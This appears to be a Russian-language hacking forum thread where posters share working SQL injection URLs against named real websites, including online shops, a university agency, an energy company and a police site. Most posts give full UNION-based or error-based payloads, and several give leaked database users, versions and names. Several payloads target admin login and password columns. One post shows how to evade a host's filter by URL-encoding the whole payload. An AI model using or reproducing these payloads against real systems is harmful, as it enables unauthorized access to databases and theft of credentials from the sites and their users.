Грибная энциклопедия Code: http://gribnikam.com/show_cat.php?catid=-1+union+select+table_name+from+information_schema.tables+limit+1,10 ТиЦ- 10 PR - 2
Code: http://www.hesa.ac.uk/index.php?option=com_pubs&Itemid=122&task=show_year&pubId=1714&versionId=23&yearId=-161+UNION+SELECT+1,2,3,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,5,6,7,8,9,10,11,12,13,14,15,16,17-- [email protected]:5.0.67-community-logrod-www GooglePR: 8
Онлайн Магазин Code: http://www.smokenator.com/store/products.php?catID=-1+union+select+1,2,version(),4-- PR = 3
5.0.90:[email protected]:b33665_cat Есть табла sys_umusers в ней users_name и users_password 4.0.27-log:[email protected]:npfpol10_cat6
Error based SQL injection helpkassa.ru: Code: http://helpkassa.ru/?id=1624%27%20and%28select+1+from%28select+count%28*%29,concat%28%28select+concat_ws%280x3b,user%28%29,database%28%29,version%28%29%29+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29--%20+11
Еврейский развлекательный сайт Code: http://ciekawostki.eu/humor.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10-- PR = 3 Данные от админки в базе.
Code: http://www.oblenergo.odessa.ua/?alias=pressa&pub=-137+union+select+1,2,3,4,5,6,7,concat_ws(0x3b,database(),user(),version()),9,10,11,12+--+ dbooe_news;menu@localhost;5.1.11-beta
Code: http://www.coda-cerva.be/index.php?option=com_organization&view=people&id=-125+UNION+SELECT+1,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12--&lang=nl JUSER@LOCALHOST:5.0.18:WEB_DATA_ORGANIZATION_DB GooglePR: 6
Магазинчик Code: http://www.a-k-a.net/prod_detail.php?id=-2+union+select+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32- тИЦ = 10 PR = 3 Еще один Code: http://www.quiltchalet.com/prod_detail.php?ID=-21+union+select+1,2,3,4,5,6,concat_ws()0x3a,userpsswd,name),8,9,10,11,12,13+from+admin--
Code: http://www.blog.oss-studio.com.ua/?go=/blog/one&id=-08024530+union+select+1,concat_ws(0x3b,user(),database(),version()),3,4,5,6+--+ [email protected];best1_blog;5.1.56-log
Разработка сайтов Code: http://www.kom.su/designsite/site.php?id=-183+union+select+version(),2,3,4%20-- ТиЦ=100 PR = 1 Разработка веб-приложений Code: http://www.it-key.su/site.php?id=-15+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables--
Сайты - "близнецы" можно сказать ) Вывод в тайтл ! Google PR: 3 Version : 5.0.82sp1-log User: patterns@localhost Database: patterns И второй : Также вывод в тайтл ! Google PR: 2 Version: 5.0.82sp1-log User: vintage@localhost Database: mainstreetvintage
Министерство внутренних дел - POLICIJA Code: http://www.policija.si/eng/index.php/index.php?option=com_tiralice&view=tiralicedetail&Itemid=153&kljuc=-167147+/*!union*/+/*!select*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37%20from%20jos_users--&cr=5169326&v=v_isk&s=ne [email protected]:5.0.67-community-log:joomla_en GooglePR: 7
тИЦ 10 Интересная скулья. Идем по адресу: Code: http://rocich.ru/article.php?sid=48-999.9+union+select+1,version(),3,4,5,6,7--+f Перенаправляет на: Code: http://www.geoteka.ru/text.html?page=[COLOR=Red]4.0.27-log[/COLOR] -- тИЦ 90 Code: http://www.auditline.ru/article.php?sid=-639+union+select+1,2,3,version(),5,6,7,8,9--+f P.S. Я ржал
Статусы для контакта, icq Code: http://www.novyestatusy.ru/status.php?id=-3301+union+select+1,2,3,database(),5,6,7,8,9 -- Строительный магазин\фирма Code: http://www.materiauxspecl.com/produit.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(0x3a,user,pass),18,19,20,21,22,23,24+from+login-- PR = 3 Code: http://www.glac.fr/en/produit.php?id=-66+union+select+table_name,2,3+from+information_schema.tables+limit+0,1-- Вывод в title. PR = 2 Еще один магазин Code: www.maytech.fr/produit.php?id=-124+union+select+1,2,3,4,5,concat_ws(0x3a,login,pass),7,8,9,10,11,12,13,14,15,16+from+users -- PR = 1 Code: http://www.boutiquesante.be/produit.php?id=-62+union+select+1,2,3,table_name,5,6,7+from+information_schema.tables-- PR = 3 Магазины PR = 3 Code: http://www.ovadesign.com/site/produit.php?id=-47+union+select+1,2,concat_ws(0x3a,login,password),4,5,6,7,8,9,10,11,12,13+from+user-- PR = 4 Code: http://piaggio.ma/piaggio/produit.php?id=-15+union+select+1,concat_ws(0x3a,user,password),3,4,5+from+administration-- PR = 1 Code: http://www.agrideal.fr/an/produit.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15%20--
Защита от peterhost. Фильтр выглядит как-то так приблизительно: /union(.*)select/is Т.е. срабатывает даже union.php?select =)) не говоря уже о union%0Aselect и т.п. примерам. Однако это все равно легко обходится «полным» url кодированием. PHP: $str = "' union select"; //$_GET['s']; foreach(str_split($str) AS $s) print '%'.bin2hex($s); concat_ws(0x3a,database(),version(),user()) Code: www.fotodi.ru/books-text.php?id=224%27%20%61%6e%64%20%31%3d%33%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%63%6f%6e%63%61%74%5f%77%73%28%30%78%33%61%2c%64%61%74%61%62%61%73%65%28%29%2c%75%73%65%72%28%29%2c%76%65%72%73%69%6f%6e%28%29%29%2c%39%20%2d%2d%20%31 P.S http://www.fotodi.ru/admin/ Жмакаем «Отмена». Я ржал.
тИЦ = 70 PageRank 4 Code: http://www.chernyahovsk.su/index.php?cat=-1+union+select+1,concat_ws(0x3a,login,password),3,4+from+auth_user --
http://myhomedeco.com/list.php?cat=17&sub=18%20/*!union*/%20select%201,2,3,4,5,6,7,8,9,10,11,Group_Concat(/*!Table_Name*/),13,14,15,16,17,18,19,20,21,22,23,24%20from%20%60information_schema%60.tables%20where%20table_schema=database%28%29--%20- help me, pls!
http://myhomedeco.com/list.php?cat=17&sub=18+/*!union+select*/+1,/*!table_name*/,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+information_schema.tables+--+
